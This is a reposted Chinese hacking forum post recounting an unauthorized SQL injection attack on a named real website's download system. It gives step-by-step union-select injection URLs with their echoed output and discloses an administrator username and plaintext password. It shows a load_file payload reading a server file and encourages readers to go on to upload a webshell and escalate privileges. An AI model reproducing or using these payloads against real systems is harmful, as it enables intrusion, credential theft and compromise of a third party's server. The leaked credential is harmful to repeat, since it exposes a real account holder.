[转载]再次入侵黑色海岸线
文章作者:xyt信息来源:CnHacker.Cn
本来没想弄黑海的,上网搜索遇见的,我想应该没事谁知道... 写这篇文章也不知出于什么样的心情,黑色海岸线也算是国内一家有些知名度的网站了,记得以前就被黑过,怎么改过后还有这么低级的错误呢?我还没有告诉黑海的人,因为我本人也没有彻底的测试,万一被别的人给黑了,丢的都是大家的面子,这里只指出漏洞,感兴趣的朋友继续测试吧~~~
[url]http://www.thysea.com/index.php[/url]黑海的主页,[url]http://download.thysea.com/list.php[/url]黑海的下载页面,大家一看就应该知道了,夜猫的系统(想起黑白网了)。
测试页面:[url]http://www.thysea.com/ymdown/show.php?id=2310[/url],提交单引号后:Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in G:\xue\黑海\ymdown\global.php on line 592,路径都出来了,字段都不用猜,都知道夜猫19个字段,提交:[url]http://www.thysea.com/ymdown/show.php?id=2310%20and%201=2%20union%20select%201[/url],2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,返回
2 演示
更新日期 1970.01.01 程序类别 不详¦不详
文件大小 4 授权方式 5
应用平台 6 推荐程度
程序主页 Home Page 下载/浏览 9/8
下载地址 上海电信 无锡电信 河南网通 暂停下载 暂停下载
简介:
12
我们知道用户密码在ymdown_user中,2和9对应字符型和数字,提交:
[url]http://www.thysea.com/ymdown/show.php?id=2310%20and%201=2%20union%20select%201[/url],username,3,4,5,6,7,8,password,10,11,12,13,14,15,16,17,18,19%20from%20ymdown_user
回显:
jiangshan 演示
更新日期 1970.01.01 程序类别 不详¦不详
文件大小 4 授权方式 5
应用平台 6 推荐程度
程序主页 Home Page 下载/浏览 0/8
下载地址 上海电信 无锡电信 河南网通 暂停下载 暂停下载
简介:
12 用户名:jiangshan 密码:0??看来密码并不是数字,继续提交:
[url]http://www.thysea.com/ymdown/show.php?id=2310%20and%201=2%20union%20select%201[/url],username,3,4,5,6,7,8,9,10,11,password,13,14,15,16,17,18,19%20from%20ymdown_user
回显:
jiangshan 演示
更新日期 1970.01.01 程序类别 不详¦不详
文件大小 4 授权方式 5
应用平台 6 推荐程度
程序主页 Home Page 下载/浏览 9/8
下载地址 上海电信 无锡电信 河南网通 暂停下载 暂停下载
简介:
jiangshanlovewufang
密码是:jiangshanlovewufang
然后直接登陆后台:[url]http://www.thysea.com/ymdown/admin/index.php[/url]顺利进入!
再来测试一下暴文件吧,就读c:/boot.ini直接用ASC编码,在2的字符处显示
提交:[url]http://www.thysea.com/ymdown/show.php?id=2310%20and%201=2%20union%20select%201[/url],load_file(char(99,58,47,98,111,111,116,46,105,110,105)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
回显:
[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] 演示
更新日期 1970.01.01 程序类别 不详¦不详
文件大小 4 授权方式 5
应用平台 6 推荐程度
程序主页 Home Page 下载/浏览 9/8
下载地址 上海电信 无锡电信 河南网通 暂停下载 暂停下载
简介:
12
顺利读出c:/boot.ini内容:[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems]
到此我也就没有再继续了,大家可以继续读config.php,上传WEBSHELL,提升权限。
最后请哪位朋友通知黑海管理员,消除漏洞
页:
[1]